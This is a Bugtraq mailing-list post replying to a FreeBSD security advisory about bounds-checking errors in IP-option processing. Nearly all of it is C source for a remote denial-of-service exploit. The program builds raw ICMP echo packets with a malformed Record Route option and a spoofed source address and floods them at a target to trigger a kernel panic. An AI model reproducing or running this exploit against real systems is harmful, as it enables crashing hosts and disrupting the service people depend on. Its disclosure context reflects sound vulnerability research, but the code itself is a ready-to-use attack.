Return-Path: owner-bugtraq@SECURITYFOCUS.COM MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Message-ID: Date: Wed, 13 Jan 1999 19:50:08 +0100 Reply-To: yeti Sender: Bugtraq List From: yeti Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options To: BUGTRAQ@SECURITYFOCUS.COM In-Reply-To: <20000622215052.D642E37BF12@hub.freebsd.org> #include #include /* Remote denial-of-service in IP stack simple exploit by y3t1 y3t1@rast.lodz.pdi.net Gretzzz : rastlin,z33d,vanitas,DYZIU,Kuki,vx,zx,korie,kaneda, d3cker&mroowka,jarv33s,funkySh,Shadow,tmoggie all from : #hwa.hax0r.news@efnet #darnet@efnet */ int rand_n(u_long zakres) { return 1+(int) ((float)zakres*rand()/(RAND_MAX+1.0)); } int main(int argc, char **argv) { char a; int sock, c,pkt,ile; struct hostent *host; u_long src_ip, dst_ip; u_char *buf; u_char options[4]; int option_s = sizeof(options); struct ipoption ipopt; srand(time(NULL)); ile=100; printf(" -= Remote denial-of-service in IP stack =- \n"); printf("\n"); printf(" by y3t1/team140\n"); printf(" y3t1@rast.lodz.pdi.net \n"); printf("\n"); if (argc < 4) { printf("%s -s src_addr -d dst_addr -p packets\n",argv[0]); printf(" -s src_addr - source address \n"); printf(" -d dst_addr - dest address \n"); printf(" -p packets - how many packets send to dest (default 100)\n"); exit(1); } opterr=0; while((a=getopt(argc,argv,"s:d:p:"))!=EOF) { switch(a) { case 's': { if ((host=gethostbyname(optarg))!=NULL) bcopy(host->h_addr,&src_ip,host->h_length); else src_ip=inet_addr(optarg); break; } case 'd': { if ((host=gethostbyname(optarg))!=NULL) bcopy(host->h_addr,&dst_ip,host->h_length); else dst_ip=inet_addr(optarg); break; } case 'p': { ile=atoi(optarg); break; } } } bzero(options,option_s); buf = malloc(IP_MAXPACKET); if (!buf) { perror("malloc"); exit(-1); } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("socket"); exit(-1); } libnet_build_ip(LIBNET_ICMP_H ,0,242,0,48,IPPROTO_ICMP,src_ip,dst_ip,NULL,0,buf); memcpy(ipopt.ipopt_list, options, option_s); *(ipopt.ipopt_list) = IPOPT_RR; *(ipopt.ipopt_list+1) = 3; *(ipopt.ipopt_list+2) = 0xff; *(ipopt.ipopt_list+3) = 0; c = libnet_insert_ipo(&ipopt,option_s,buf); if (c == -1) { printf("Error\n"); exit(1); } libnet_build_icmp_echo(ICMP_ECHO,0,242,31337,NULL,0,buf+LIBNET_IP_H+option_s); if (libnet_do_checksum(buf,IPPROTO_ICMP,LIBNET_ICMP_ECHO_H)==-1) { printf("can't do checksum \n"); } for (pkt=0;pkt -----BEGIN PGP SIGNED MESSAGE----- > Topic: Remote denial-of-service in IP stack > > Category: core > Module: kernel > > There are several bugs in the processing of IP options in the FreeBSD > IP stack, which fail to correctly bounds-check arguments and contain > other coding errors leading to the possibility of data corruption and > a kernel panic upon reception of certain invalid IP packets. >